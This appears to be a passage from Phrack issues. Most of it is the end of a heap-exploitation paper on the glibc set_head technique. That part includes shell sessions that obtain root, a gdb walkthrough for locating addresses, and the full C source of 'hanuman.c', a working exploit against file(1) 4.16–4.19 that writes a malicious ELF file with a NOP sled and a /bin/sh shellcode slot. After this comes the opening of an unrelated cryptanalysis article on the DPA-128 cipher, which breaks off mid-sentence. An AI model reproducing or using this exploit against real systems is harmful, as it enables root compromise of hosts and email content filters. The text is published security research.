0x80496b4 is a valid address.

5- You can now call the exploit with the values that you have found.  The
return location will be 0xbffffffc, and it will decrement with each write.
The shellcode in exp2.c executes /bin/id.

bash$ ./exp2 0xbffffffc 0x80496b4 0x804a6a8 | ./scenario2
--[ Using 0x804a6a8 as the top chunk location.
--[ Using 0xbffffffc as the return location.
--[ Impossible to use 0x80496b4 as the return address. Using 0x80496b9
--[ Using 0xbffff6a4 as the return location.
--[ Impossible to use 0x804a00c as the return address. Using 0x804a011
uid=0(root) gid=0(root) groups=0(root)

----[ 6.2 - A real case scenario: file(1) utility

The set_head technique was developed during the research of a security
hole in the UNIX file(1) utility, an automatic file content type
recognition tool found on many UNIX systems.  The affected releases are
versions 4.00 to 4.19 of Ian Darwin's implementation, maintained by
Christos Zoulas, which is the standard version of file(1) for Linux, *BSD,
and other systems.

So much energy was put into the development of this exploit mainly
because the presence of a vulnerability in this utility represents a high
security risk for an SMTP content filter.

An SMTP content filter is a system that acts after the SMTP server receives
email and applies various filtering policies defined by a network
administrator.  Once the scanning process is finished, the filter decides
whether the message will be relayed or not.

An SMTP content filter needs to be able to call different kinds of programs
on an incoming email:

        - Dearchivers;
        - Decoders;
        - Classifiers;
        - Antivirus;
        - and many more ...

The file(1) utility falls under the "classifiers" category.

This attack vector gives a completely new meaning to vulnerabilities that
were classified as low risk.

The author of this paper is also the maintainer of PIRANA [7], an
exploitation framework that tests the security of an email content filter.
By means of a vulnerability database, the content filter to be tested will
be bombarded by various emails containing a malicious payload intended to
compromise the computing platform.  PIRANA's goal is to test whether or not
any vulnerability exists on the content filtering platform.

------[ 6.2.1 - The hole

The security vulnerability is in the file_printf() function.  This function
fills the content of the 'ms->o.buf' buffer with the characteristics of the
inspected file.  Once this is done, the buffer is printed on the screen,
showing what type of file was detected.  Here is the vulnerable function:

--[ From file-4.19/src/funcs.c

01 protected int
02 file_printf(struct magic_set *ms, const char *fmt, ...)
03 {
04         va_list ap;
05         size_t len;
06         char *buf;
08         va_start(ap, fmt);
09         if ((len = vsnprintf(ms->o.ptr, ms->o.len, fmt, ap)) >= ms->o.len) {
10                 va_end(ap);
11                 if ((buf = realloc(ms->o.buf, len + 1024)) == NULL) {
12                         file_oomem(ms, len + 1024);
13                         return -1;
14                 }
15                 ms->o.ptr = buf + (ms->o.ptr - ms->o.buf);
16                 ms->o.buf = buf;
17                 ms->o.len = ms->o.size - (ms->o.ptr - ms->o.buf);
18                 ms->o.size = len + 1024;
20                 va_start(ap, fmt);
21                 len = vsnprintf(ms->o.ptr, ms->o.len, fmt, ap);
22         }
23         ms->o.ptr += len;
24         ms->o.len -= len;
25         va_end(ap);
26         return 0;
27 }

At first sight, this function seems to take good care of not overflowing
the 'ms->o.ptr' buffer.  A first copy is done at line 09.  If the
destination buffer, 'ms->o.buf', is not big enough to receive the character
string, the memory region is reallocated.

The reallocation is done at line 11, but the new size is not computed
properly.  Indeed, the function assumes that the needed buffer will never
be bigger than the current length of the processed string plus 1024 bytes.

The real problem is at line 21.  The variable 'ms->o.len' represents the
number of bytes left in 'ms->o.buf'.  The variable 'len', on the other
hand, represents the number of characters (not including the trailing
'\0') which would have been written to the final string if enough space
had been available.  Whenever the string to be printed is larger than
'ms->o.len', 'len' ends up greater than 'ms->o.len'.  Then, at line 24,
'len' is subtracted from 'ms->o.len'.  Since 'ms->o.len' is of type
'size_t', it underflows below 0 and becomes a very big positive integer.
Subsequent vsnprintf() calls then receive a very big length parameter,
thus rendering any bounds checking useless.

------[ 6.2.2 - All the pieces fall into place

There is an interesting portion of code in the donote() function of
readelf.c: a call to the vulnerable function, file_printf(), with a
user-supplied buffer.  By taking advantage of this code, it will be a lot
simpler to write a successful exploit.  Indeed, it will be possible to
overwrite the chunk information with arbitrary values.

        --[ From file-4.19/src/readelf.c

          /*
           * Extract the program name.  It is at
           * offset 0x7c, and is up to 32-bytes,
           * including the terminating NUL.
           */
          if (file_printf(ms, ", from '%.31s'",
              &nbuf[doff + 0x7c]) == -1)
                  return size;

After a couple of tries overflowing the header of the next chunk, it was
clear that the only thing that was overflowable was the wilderness chunk.
It was not possible to provoke a situation where a chunk that was not
adjacent to the top chunk could be overflowed with user controllable
data.
The file utility suffers from this buffer overflow since the 4.00 release
when the first version of file_printf() was introduced.  A successful
exploitation was only possible starting from version 4.16.  Indeed, this
version included a call to malloc with a user controllable variable:

        --[ From file-4.19/src/readelf.c

          if ((nbuf = malloc((size_t)xsh_size)) == NULL) {
           file_error(ms, errno, "Cannot allocate memory"
               " for note");
           return -1;
          }

This was the missing piece of the puzzle.  Now, every condition is met to
use the set_head() technique.

------[ 6.2.3 - hanuman.c

/*
 * hanuman.c
 * file(1) exploit for version 4.16 to 4.19.
 * Coded by Jean-Sebastien Guay-Leroux
 */


Here are the steps to find the 3 memory values to use for the file(1)
exploit.

1- The first step is to generate a core dump file from file(1).  You will
then have to analyze this core dump to find the proper values for your
exploit.

To generate the core file, get an approximation of the top chunk location
by getting the base address of the BSS section:

bash# readelf -S /usr/bin/file

Section Headers:
  [Nr] Name              Type            Addr
  [ 0]                   NULL            00000000
  [ 1] .interp           PROGBITS        080480f4
  [22] .bss              NOBITS          0804b1e0

The BSS section starts at 0x0804b1e0.  Let's call the exploit the following
way, and remember to replace 0x0804b1e0 with the BSS value you have found:

bash# ./hanuman 0xc0c0c0c0 0x0804b1e0 0x0804b1e0 mal
--[ Using 0x804b1e0 as the top chunk location.
--[ Impossible to use 0xc0c0c0c0 as the return location. Using 0xc0c0c0c4
--[ Impossible to use 0x804b1e0 as the return address. Using 0x804b1e1
--[ The file has been written
bash# file mal
Segmentation fault (core dumped)

2- Call gdb on that core dump file.

bash# gdb -q file core.14854
Core was generated by `file mal'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /usr/local/lib/
Loaded symbols for /usr/local/lib/
Reading symbols from /lib/i686/
Loaded symbols for /lib/i686/
Reading symbols from /lib/
Loaded symbols for /lib/
Reading symbols from /usr/lib/gconv/
Loaded symbols for /usr/lib/gconv/
#0  0x400a3d15 in mallopt () from /lib/i686/

3- The EAX register contains the address of the top chunk.  It might be
another register for you.

(gdb) info reg eax
eax            0x80614f8        134616312

4- Start searching from the location of the top chunk to find the NOP
cushion.  This will be the return address.

0x80614f8:      0xc0c0c0c1      0xb8bc0ee1      0xc0c0c0c1      0xc0c0c0c1
0x8061508:      0xc0c0c0c1      0xc0c0c0c1      0x73282027      0x616e6769
0x8061518:      0x2930206c      0x90909000      0x90909090      0x90909090
0x8061528:      0x90909090      0x90909090      0x90909090      0x90909090
0x8061538:      0x90909090      0x90909090      0x90909090      0x90909090
0x8061548:      0x90909090      0x90909090      0x90909090      0x90909090
0x8061558:      0x90909090      0x90909090      0x90909090      0x90909090
0x8061568:      0x90909090      0x90909090      0x90909090      0x90909090
0x8061578:      0x90909090      0x90909090      0x90909090      0x90909090
0x8061588:      0x90909090      0x90909090      0x90909090      0x90909090
0x8061598:      0x90909090      0x90909090      0x90909090      0x90909090
0x80615a8:      0x90909090      0x90909090      0x90909090      0x90909090
0x80615b8:      0x90909090      0x90909090

0x8061558 is a valid address.

5- To get the return location for your exploit, get a saved EIP from a
stack frame.

(gdb) frame 3
#3  0x4001f32e in file_tryelf (ms=0x804bc90, fd=3, buf=0x0, nbytes=8192) at
1007                            if (doshn(ms, class, swap, fd,
(gdb) x $ebp+4
0xbffff7fc:     0x400172b3

0xbffff7fc is the return location.

6- You can now call the exploit with the values that you have found.

bash# ./hanuman 0xbffff7fc 0x8061558 0x80614f8 mal
--[ Using 0x80614f8 as the top chunk location.
--[ Using 0xbffff7fc as the return location.
--[ Impossible to use 0x8061558 as the return address. Using 0x8061559
--[ The file has been written
bash# file mal


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <stdint.h>

#define DEBUG                           0

#define initial_ELF_garbage             75
//ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically
// linked

#define initial_netbsd_garbage          22
//, NetBSD-style, from '

#define post_netbsd_garbage             12
//' (signal 0)

// The following #define are from malloc.c and are used
// to compute the values for the malloc size and the top chunk size.
#define PREV_INUSE 0x1
#define SIZE_SZ (sizeof(size_t))
#define MIN_CHUNK_SIZE 16
#define MALLOC_ALIGNMENT (2 * SIZE_SZ)
#define MALLOC_ALIGN_MASK (MALLOC_ALIGNMENT - 1)
#define IS_MMAPPED 0x2
#define NON_MAIN_ARENA 0x4
#define SIZE_BITS (PREV_INUSE|IS_MMAPPED|NON_MAIN_ARENA)
#define MINSIZE (unsigned long)(((MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) \
        & ~MALLOC_ALIGN_MASK))
#define request2size(req) (((req) + SIZE_SZ + MALLOC_ALIGN_MASK \
        < MINSIZE) ? MINSIZE : \
        ((req) + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK)

// Offsets of the note entries in the file
#define OFFSET_31_BYTES  2048
#define OFFSET_N_BYTES   2304
#define OFFSET_0_BYTES   2560
#define OFFSET_OVERWRITE 2816
#define OFFSET_SHELLCODE 4096   // the shellcode region spans the last
                                // 4096 bytes of the 8192 bytes buffer

/* linux_ia32_exec -  CMD=/bin/sh Size=68 Encoder=PexFnstenvSub */
unsigned char scode[] =
    "";     /* the 68 bytes of shellcode are omitted in this listing */

struct math {
    int nnetbsd;
    int nname;
};

struct sethead {
    unsigned long topchunk_size;
    unsigned long malloc_size;
};

// To be a little more independent, we ripped
// the following ELF structures from elf.h
typedef struct {
    unsigned char e_ident[16];
    uint16_t e_type;
    uint16_t e_machine;
    uint32_t e_version;
    uint32_t e_entry;
    uint32_t e_phoff;
    uint32_t e_shoff;
    uint32_t e_flags;
    uint16_t e_ehsize;
    uint16_t e_phentsize;
    uint16_t e_phnum;
    uint16_t e_shentsize;
    uint16_t e_shnum;
    uint16_t e_shstrndx;
} Elf32_Ehdr;

typedef struct {
    uint32_t sh_name;
    uint32_t sh_type;
    uint32_t sh_flags;
    uint32_t sh_addr;
    uint32_t sh_offset;
    uint32_t sh_size;
    uint32_t sh_link;
    uint32_t sh_info;
    uint32_t sh_addralign;
    uint32_t sh_entsize;
} Elf32_Shdr;

typedef struct {
    uint32_t n_namesz;
    uint32_t n_descsz;
    uint32_t n_type;
} Elf32_Nhdr;

struct sethead * set_head_compute
    (unsigned long retloc, unsigned long retadr, unsigned long toploc) {

    unsigned long check_retloc, check_retadr;
    struct sethead *shead;

    shead = (struct sethead *) malloc (8);
    if (shead == NULL) {
        fprintf (stderr,
            "--[ Could not allocate memory for sethead structure\n");
        exit (1);
    }

    if ( (toploc % 8) != 0 ) {
        fprintf (stderr,
            "--[ Impossible to use 0x%x as the top chunk location.",
            toploc);
        toploc = toploc - (toploc % 8);
        fprintf (stderr, "  Using 0x%x instead\n", toploc);
    } else
        fprintf (stderr,
            "--[ Using 0x%x as the top chunk location.\n", toploc);

    // The minus 8 is to take care of the normalization
    // of the malloc parameter
    shead->malloc_size = (retloc - toploc - 8);

    // By adding the 8, we are able to sometimes perfectly hit
    // the return address.  To hit it perfectly, retadr must be a multiple
    // of 8 + 1 (for the PREV_INUSE flag).
    shead->topchunk_size = (retadr + shead->malloc_size + 8) | PREV_INUSE;

    if (shead->topchunk_size < shead->malloc_size) {
        fprintf (stderr,
            "--[ ERROR: topchunk size is less than malloc size.\n");
        fprintf (stderr, "--[ Topchunk code will not be triggered\n");
        exit (1);
    }

    check_retloc = (toploc + request2size (shead->malloc_size) + 4);
    if (check_retloc != retloc) {
        fprintf (stderr,
            "--[ Impossible to use 0x%x as the return location. ", retloc);
        fprintf (stderr, "Using 0x%x instead\n", check_retloc);
    } else
        fprintf (stderr, "--[ Using 0x%x as the return location.\n",
            retloc);

    check_retadr = ( (shead->topchunk_size & ~(SIZE_BITS))
        - request2size (shead->malloc_size)) | PREV_INUSE;
    if (check_retadr != retadr) {
        fprintf (stderr,
            "--[ Impossible to use 0x%x as the return address.", retadr);
        fprintf (stderr, " Using 0x%x instead\n", check_retadr);
    } else
        fprintf (stderr, "--[ Using 0x%x as the return address.\n",
            retadr);

    return shead;
}

// Not CPU friendly :)
struct math *
compute (int offset) {

    int accumulator = 0;
    int i, j;
    struct math *math;

    math = (struct math *) malloc (8);

    if (math == NULL) {
        printf ("--[ Could not allocate memory for math structure\n");
        exit (1);
    }

    for (i = 1; i < 100;i++) {

        for (j = 0; j < (i * 31); j++) {

            accumulator = 0;
            accumulator += initial_ELF_garbage;
            accumulator += (i * (initial_netbsd_garbage +
                post_netbsd_garbage));
            accumulator += initial_netbsd_garbage;

            accumulator += j;

            if (accumulator == offset) {
                math->nnetbsd = i;
                math->nname = j;

                return math;
            }
        }
    }

    // Failed to find a value
    return 0;
}

void
put_byte (char *ptr, unsigned char data) {
    *ptr = data;
}

void
put_longword (char *ptr, unsigned long data) {
    put_byte (ptr, data);
    put_byte (ptr + 1, data >> 8);
    put_byte (ptr + 2, data >> 16);
    put_byte (ptr + 3, data >> 24);
}

FILE *
open_file (char *filename) {

    FILE *fp;

    fp = fopen ( filename , "w" );

    if (!fp) {
        perror ("Can't open file");
        exit (1);
    }

    return fp;
}

void
usage (char *progname) {

    printf ("\nTo use:\n");
    printf ("%s <return location> <return address> ", progname);
    printf ("<topchunk location> <output filename>\n\n");

    exit (1);
}

int
main (int argc, char *argv[]) {

    FILE *fp;
    Elf32_Ehdr *elfhdr;
    Elf32_Shdr *elfshdr;
    Elf32_Nhdr *elfnhdr;
    char *filename;
    char *buffer, *ptr;
    int i;
    struct math *math;
    struct sethead *shead;
    int left_bytes;
    unsigned long retloc, retadr, toploc;
    unsigned long topchunk_size, malloc_size;

    if ( argc != 5) {
        usage ( argv[0] );
    }

    sscanf (argv[1], "0x%x", &retloc);
    sscanf (argv[2], "0x%x", &retadr);
    sscanf (argv[3], "0x%x", &toploc);

    filename = (char *) malloc (256);
    if (filename == NULL) {
        printf ("--[ Cannot allocate memory for filename...\n");
        exit (1);
    }
    strncpy (filename, argv[4], 255);
    filename[255] = '\0';

    buffer = (char *) malloc (8192);
    if (buffer == NULL) {
        printf ("--[ Cannot allocate memory for file buffer\n");
        exit (1);
    }
    memset (buffer, 0, 8192);

    math = compute (1036);
    if (!math) {
        printf ("--[ Unable to compute a value\n");
        exit (1);
    }

    shead = set_head_compute (retloc, retadr, toploc);
    topchunk_size = shead->topchunk_size;
    malloc_size = shead->malloc_size;

    ptr = buffer;
    elfhdr = (Elf32_Ehdr *) ptr;

    // Fill our ELF header
    elfhdr->e_type =            2;       // ET_EXEC
    elfhdr->e_machine =         3;       // EM_386
    elfhdr->e_version =         1;       // EV_CURRENT
    elfhdr->e_entry =           0;
    elfhdr->e_phoff =           0;
    elfhdr->e_shoff =           52;
    elfhdr->e_flags =           0;
    elfhdr->e_ehsize =          52;
    elfhdr->e_phentsize =       32;
    elfhdr->e_phnum =           0;
    elfhdr->e_shentsize =       40;
    elfhdr->e_shnum =           math->nnetbsd + 2;
    elfhdr->e_shstrndx =        0;

    ptr += elfhdr->e_ehsize;
    elfshdr = (Elf32_Shdr *) ptr;

    // This loop lets us eat an arbitrary number of bytes in ms->o.buf
    left_bytes = math->nname;
    for (i = 0; i < math->nnetbsd; i++) {
        elfshdr->sh_name        = 0;
        elfshdr->sh_type        = 7;   // SHT_NOTE
        elfshdr->sh_flags       = 0;
        elfshdr->sh_addr        = 0;
        elfshdr->sh_size        = 256;
        elfshdr->sh_link        = 0;
        elfshdr->sh_info        = 0;
        elfshdr->sh_addralign   = 0;
        elfshdr->sh_entsize     = 0;

        if (left_bytes > 31) {
            // filename == 31
            elfshdr->sh_offset = OFFSET_31_BYTES;
            left_bytes -= 31;
        } else if (left_bytes != 0) {
            // filename < 31 && != 0
            elfshdr->sh_offset = OFFSET_N_BYTES;
            left_bytes = 0;
        } else {
            // filename == 0
            elfshdr->sh_offset = OFFSET_0_BYTES;
        }
        // The first section header will also let us load
        // the shellcode in memory :)
        // Indeed, by requesting a large memory block,
        // the topchunk will be splitted, and this memory region
        // will be left untouched until we need it.
        // We assume its name is 31 bytes long.
        if (i == 0) {
            elfshdr->sh_size = 4096;
            elfshdr->sh_offset = OFFSET_SHELLCODE;
        }

        elfshdr++;
    }

    // This section header entry is for the data that will
    // overwrite the topchunk size pointer
    elfshdr->sh_name        = 0;
    elfshdr->sh_type        = 7;      // SHT_NOTE
    elfshdr->sh_flags       = 0;
    elfshdr->sh_addr        = 0;
    elfshdr->sh_offset      = OFFSET_OVERWRITE;
    elfshdr->sh_size        = 256;
    elfshdr->sh_link        = 0;
    elfshdr->sh_info        = 0;
    elfshdr->sh_addralign   = 0;
    elfshdr->sh_entsize     = 0;
    elfshdr++;

    // This section header entry triggers the call to malloc
    // with a user supplied length.
    // It is a requirement for the set_head technique to work
    elfshdr->sh_name        = 0;
    elfshdr->sh_type        = 7;     // SHT_NOTE
    elfshdr->sh_flags       = 0;
    elfshdr->sh_addr        = 0;
    elfshdr->sh_offset      = OFFSET_N_BYTES;
    elfshdr->sh_size        = malloc_size;
    elfshdr->sh_link        = 0;
    elfshdr->sh_info        = 0;
    elfshdr->sh_addralign   = 0;
    elfshdr->sh_entsize     = 0;

    // This note entry lets us eat 31 bytes + overhead
    elfnhdr = (Elf32_Nhdr *) (buffer + OFFSET_31_BYTES);
    elfnhdr->n_namesz       = 12;
    elfnhdr->n_descsz       = 12;
    elfnhdr->n_type         = 1;
    ptr = buffer + OFFSET_31_BYTES + 12;
    sprintf (ptr, "NetBSD-CORE");
    // the 31 bytes long name eaten by this entry
    sprintf (buffer + OFFSET_31_BYTES + 24 + 0x7c,
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");

    // This note entry lets us eat an arbitrary number of bytes + overhead
    elfnhdr = (Elf32_Nhdr *) (buffer + OFFSET_N_BYTES);
    elfnhdr->n_namesz       = 12;
    elfnhdr->n_descsz       = 12;
    elfnhdr->n_type         = 1;
    ptr = buffer + OFFSET_N_BYTES + 12;
    sprintf (ptr, "NetBSD-CORE");
    for (i = 0; i < (math->nname % 31); i++)
        put_byte (buffer + OFFSET_N_BYTES + 24 + 0x7c + i, 'A');

    // This note entry lets us eat 0 bytes + overhead
    elfnhdr = (Elf32_Nhdr *) (buffer + OFFSET_0_BYTES);
    elfnhdr->n_namesz       = 12;
    elfnhdr->n_descsz       = 12;
    elfnhdr->n_type         = 1;
    ptr = buffer + OFFSET_0_BYTES + 12;
    sprintf (ptr, "NetBSD-CORE");

    // This note entry lets us specify the value that will
    // overwrite the topchunk size
    elfnhdr = (Elf32_Nhdr *) (buffer + OFFSET_OVERWRITE);
    elfnhdr->n_namesz       = 12;
    elfnhdr->n_descsz       = 12;
    elfnhdr->n_type         = 1;
    ptr = buffer + OFFSET_OVERWRITE + 12;
    sprintf (ptr, "NetBSD-CORE");
    // Put the new topchunk size 7 times in memory
    // (the note entry program name lives at offset 24 + 0x7c)
    for (i = 0; i < 7; i++)
        put_longword (buffer + OFFSET_OVERWRITE + 24 + 0x7c + (i * 4),
            topchunk_size);

    // This note entry lets us eat 31 bytes + overhead, but
    // its real purpose is to load the shellcode in memory.
    // We assume that its name is 31 bytes long.
    elfnhdr = (Elf32_Nhdr *) (buffer + OFFSET_SHELLCODE);
    elfnhdr->n_namesz       = 12;
    elfnhdr->n_descsz       = 12;
    elfnhdr->n_type         = 1;
    ptr = buffer + OFFSET_SHELLCODE + 12;
    sprintf (ptr, "NetBSD-CORE");
    sprintf (buffer + OFFSET_SHELLCODE + 24 + 0x7c,
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");

    // Fill this memory region with our shellcode.
    // Remember to leave the note entry untouched ...
    memset (buffer + OFFSET_SHELLCODE + 256, 0x90, 4096-256);
    sprintf (buffer + 8191 - strlen (scode), scode);

    fp = open_file (filename);
    if (fwrite (buffer, 8192, 1, fp) != 0 ) {
        printf ("--[ The file has been written\n");
    } else {
        printf ("--[ Can not write to the file\n");
        exit (1);
    }
    fclose (fp);

    free (shead);
    free (math);
    free (buffer);
    free (filename);

    return 0;
}
--[ 7 - Final words

That's all for the details of this technique; a lot has already been said
throughout this paper.  Given the complexity of the malloc code, there
are probably many other ways to take control of a process by corrupting
the malloc chunks.

Of course, this paper explains the technical details of set_head, but
personally, I think that all exploitation techniques are ephemeral.  This
is all the more true recently, with all the low level security controls
that have been added to modern operating systems.  Besides having great
technical skills, I personally think it's important to develop your
mental skills and your creativity.  Try to improve your attitude when
solving a difficult problem.  Develop your perseverance and determination,
even though you may have failed at the same thing 20, 50 or 100 times in a
row.
I would like to greet the following individuals: bond, dp, jinx,
Michael and nitr0gen.  There are more people whom I surely forget.  Thanks
for the help and the great conversations we had over the last few years.

--[ 8 - References

1. Solar Designer,

2. Anonymous,

3. Kaempf, Michel,

4. Phantasmal Phantasmagoria,

5. Phantasmal Phantasmagoria,

6. jp,

7. Guay-Leroux, Jean-Sebastien,

8. gera,

9. The Shellcoder's Handbook: Discovering and Exploiting Security Holes
(2004), Wiley


              _                                                _
            _/B\_                                            _/W\_
            (* *)             Phrack #64 file 10             (* *)
            | - |                                            | - |
            |   |          Cryptanalysis of DPA-128          |   |
            |   |                                            |   |
            |   |                  By SysK                   |   |
            |   |                                            |   |
            |   |                                            |   |

--[ Contents

1 - Introduction
2 - A short word about block ciphers
3 - Overview of block cipher cryptanalysis
4 - Veins' DPA-128
  4.1 - Bugs in the implementation
  4.2 - Weaknesses in the design
5 - Breaking the linearized version
6 - On the non linearity of addition modulo n in GF(2)
7 - Exploiting weak keys
  7.1 - Playing with a toy cipher
  7.2 - Generalization and expected complexity
  7.3 - Cardinality of |W
8 - Breaking DPA based unkeyed hash function
  8.1 - Introduction to hash functions
  8.2 - DPAsum() algorithm
  8.3 - Weaknesses in the design/implementation
  8.4 - A (2nd) preimage attack
9 - Conclusion
10 - Greetings
11 - Bibliography

--[ 1 - Introduction

While the cracking scene has grown with cryptology thanks to the evolution
of binary protection schemes, the hacking scene mostly hasn't. This is
largely because there was globally no real need for it. Indeed it's well
known that if a hacker needs to decrypt some files then he will hack into
the box of their owner, backdoor the system and then use it to steal the
key. A cracker who needs to break a protection scheme will not have the
same approach: he will usually try to understand it fully in order to find
and exploit design and/or implementation flaws.

Although the growth of the security industry over the last few years has
changed the situation a little regarding the hacking community, nowadays
there are still too many people with weak knowledge of this science. What
is disturbing is the spreading of urban legends and other hoaxes by some
paranoids among them. For example, haven't you ever heard people claiming
that government agencies were able to break RSA or AES? A much more clever
question would have been: what does "break" mean?

A good example of paranoid reaction can be found in M1lt0n's article
[FakeP63]. The author who is probably skilled in hacking promotes the use
of "home made cryptographic algorithms" instead of standardized ones such
as 3DES. The corresponding argument is that since most so-called security
experts lack coding skills, they aren't able to develop appropriate
tools for exotic ciphers. While I agree at least partially with him
regarding the coding abilities, I can't possibly agree with the main
thesis. Indeed if some public tools are sufficient to break a 3DES based
protection then it means that a design and/or an implementation mistake
was/were made since, according to the state of the art, 3DES is still
unbroken. The cryptosystem was weak from the beginning and using "home 
made cryptography" would only weaken it more. 

It is therefore extremely important to understand cryptography and to 
trust the standards. In a previous Phrack issue (Phrack 62), Veins exposed
to the hacking community a "home made" block cipher called DPA (Dynamic 
Polyalphabetic Algorithms) [DPA128]. In the following paper, we are going 
to analyze this cipher and demonstrate that it is not flawless - at least
from a cryptanalytic perspective - thus fitting perfectly with our talk.

--[ 2 - A short word about block ciphers

Let's quote a little bit from the excellent HAC [MenVan]:

"A block cipher is a function which maps n-bit plaintext blocks to n-bit 
ciphertext blocks; n is called the blocklength. It may be viewed as a 
simple substitution cipher with large character size. The function is 
parametrized by a k-bit key K, taking values from a subset |K (the key 
space) of the set of all k-bit vectors Vk. It is generally assumed that
the key is chosen at random. Use of plaintext and ciphertext blocks of
equal size avoids data expansion." 

Pretty clear isn't it? :> So what's the purpose of such a cryptosystem?
Obviously since we are dealing with encryption, this class of algorithms
provides confidentiality. Its construction makes it particularly suitable
for applications such as large volume encryption (files or HD for
example). Used in special modes such as CBC (like in OpenSSL), it can
also provide stream encryption. For example, AES-CBC is used in the WPA2,
SSL and SSH protocols.

Remark: When used in conjunction with other mechanisms, block ciphers can 
also provide services such as authentication or integrity (cf part 8 of 
the paper).

An important point is understanding what cryptology is for. While
cryptography aims at designing the best algorithms, that is to say secure
and fast ones, cryptanalysis allows the evaluation of the security of
those algorithms. The more weaknesses an algorithm is proved to have, the
less we should trust it.

--[ 3 - Overview of block cipher cryptanalysis

The cryptanalysis of block ciphers evolved significantly in the 90s with
the appearance of some fundamental methods such as differential
[BiSha90] and linear [Matsui92] cryptanalysis. In addition to some
more recent ones like the boomerang attack of Wagner or the chi square
cryptanalysis of Vaudenay [Vaud], they constitute the set of so-called
statistical attacks on block ciphers, in opposition to the very recent and
still controversial algebraic ones (see [CourtAlg] for more information).

Today the evolution of block cipher cryptanalysis tends to stabilize 
itself. However a cryptographer still has to acquire quite a deep knowledge
of those attacks in order to design a cipher. Reading the Phrack paper, we 
think - actually we may be wrong - that the author mostly based his design 
on statistical tests. Although they are obviously necessary, they can't 
possibly be enough. Every component has to be carefully chosen. We 
identified several weaknesses and think that some more may still be left.

--[ 4 - Veins' DPA-128 description

DPA-128 is a 16 rounds block cipher providing 128 bits block encryption 
using an n bits key. Each round encryption is composed of 3 functions
which are rbytechain(), rbitshift() and S_E(). Thus for each input block,
we apply the E() function 16 times (one per round) :

void E (unsigned char *key, unsigned char *block, unsigned int shift)
{
    rbytechain (block);
    rbitshift (block, shift);
    S_E (key, block, shift);
}

where:

- block is the 128b input
- shift is a 32b parameter dependent on the round subkey
- key is the 128b round subkey

Consequently, the mathematical description of this cipher is:
f: |P x |K ----> |C

where:
    - |P is the set of all plaintexts
    - |K is the set of all keys
    - |C is the set of all ciphertexts

For p element of |P, k of |K and c of |C, we have c = f(p,k)
with f = E o E o ... o E = E^16, where 'o' means the composition of
functions.

We are now going to describe each function. Since we sometimes may need
mathematics to do so, we will assume that the reader is familiar with
basic algebra ;>

rbytechain() is described by the following C function:

void rbytechain(unsigned char *block)
{
    int i;

    for (i = 0; i < DPA_BLOCK_SIZE; ++i)
        block[i] ^= block[(i + 1) % DPA_BLOCK_SIZE];
}

where:

    - block is the 128b input
    - DPA_BLOCK_SIZE equals 16
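Note already that this byte chaining uses XOR only, so it must satisfy
rbytechain(a ^ b) == rbytechain(a) ^ rbytechain(b) for any two blocks: a
quick self-contained check (rbytechain() copied from above, test blocks
arbitrary):

```c
#include <string.h>

#define DPA_BLOCK_SIZE 16

/* rbytechain() copied from the cipher above */
void rbytechain(unsigned char *block)
{
    int i;

    for (i = 0; i < DPA_BLOCK_SIZE; ++i)
        block[i] ^= block[(i + 1) % DPA_BLOCK_SIZE];
}

/* returns 1 if rbytechain(a ^ b) == rbytechain(a) ^ rbytechain(b) */
int check_linearity(const unsigned char *a, const unsigned char *b)
{
    unsigned char xa[DPA_BLOCK_SIZE], xb[DPA_BLOCK_SIZE];
    unsigned char xab[DPA_BLOCK_SIZE];
    int i;

    memcpy(xa, a, DPA_BLOCK_SIZE);
    memcpy(xb, b, DPA_BLOCK_SIZE);
    for (i = 0; i < DPA_BLOCK_SIZE; ++i)
        xab[i] = a[i] ^ b[i];

    rbytechain(xa);             /* M.a       */
    rbytechain(xb);             /* M.b       */
    rbytechain(xab);            /* M.(a ^ b) */

    for (i = 0; i < DPA_BLOCK_SIZE; ++i)
        if (xab[i] != (xa[i] ^ xb[i]))
            return 0;
    return 1;
}
```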

Such an operation on bytes is called linear mixing and its goal is to 
provide the diffusion of information (according to the well known Shannon
theory). Mathematically, it's no more than a linear map between two GF(2) 
vector spaces of dimension 128. Indeed, if U and V are vectors over GF(2) 
representing respectively the input and the output of rbytechain() then 
V = M.U where M is a 128x128 matrix over GF(2) of the linear map where 
coefficients of the matrix are trivial to find. Now let's see rbitshift(). 
Its C version is:

void rbitshift(unsigned char *block, unsigned int shift)
{
    unsigned int i;
    unsigned int div;
    unsigned int mod;
    unsigned int rel;
    unsigned char mask;
    unsigned char remainder;
    unsigned char sblock[DPA_BLOCK_SIZE];

    if (shift)
    {
        mask = 0;
        shift %= 128;
        div = shift / 8;
        mod = shift % 8;
        rel = DPA_BLOCK_SIZE - div;
        for (i = 0; i < mod; ++i)
            mask |= (1 << i);

        for (i = 0; i < DPA_BLOCK_SIZE; ++i)
        {
            remainder =
                ((block[(rel + i - 1) % DPA_BLOCK_SIZE]) & mask) << (8 - mod);
            sblock[i] =
                ((block[(rel + i) % DPA_BLOCK_SIZE]) >> mod) | remainder;
        }
    }
    memcpy(block, sblock, DPA_BLOCK_SIZE);
}

where:

    - block is the 128b input
    - DPA_BLOCK_SIZE equals 16
    - shift is derived from the round subkey

Veins describes it in his paper as a key-related shifting (in fact it has
to be a key-related 'rotation' since we intend to be able to decrypt the 
ciphertext ;)). A careful read of the code and several tests confirmed that
it was not erroneous (up to a bug detailed later in this paper), so we can 
describe it as a linear map between two GF(2) vector spaces of dimension 128. 

Indeed, if V and W are vectors over GF(2) representing respectively the 
input and the output of rbitshift() then:

W = M'.V where M' is the 128x128 matrix over GF(2) of the linear 
map where, unlike the previous function, coefficients of the matrix are 
unknown up to a probability of 1/128 per round.

Such a function also provides diffusion of information.

Finally, the last operation S_E() is described by the C code:

void S_E (unsigned char *key, unsigned char *block, unsigned int s)
{
    int i;

    for (i = 0; i < DPA_BLOCK_SIZE; ++i)
        block[i] = (key[i] + block[i] + s) % 256;
}

where:

    - block is the 128b input
    - DPA_BLOCK_SIZE equals 16
    - s is the shift parameter described in the previous function
    - key is the round subkey
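Unlike the xor-based mixing, this byte-wise addition is not GF(2)-linear:
carry propagation breaks the relation A(x^y) = A(x) ^ A(y) ^ A(0) that any
GF(2)-affine map must satisfy. A small sketch (the key byte k and shift s
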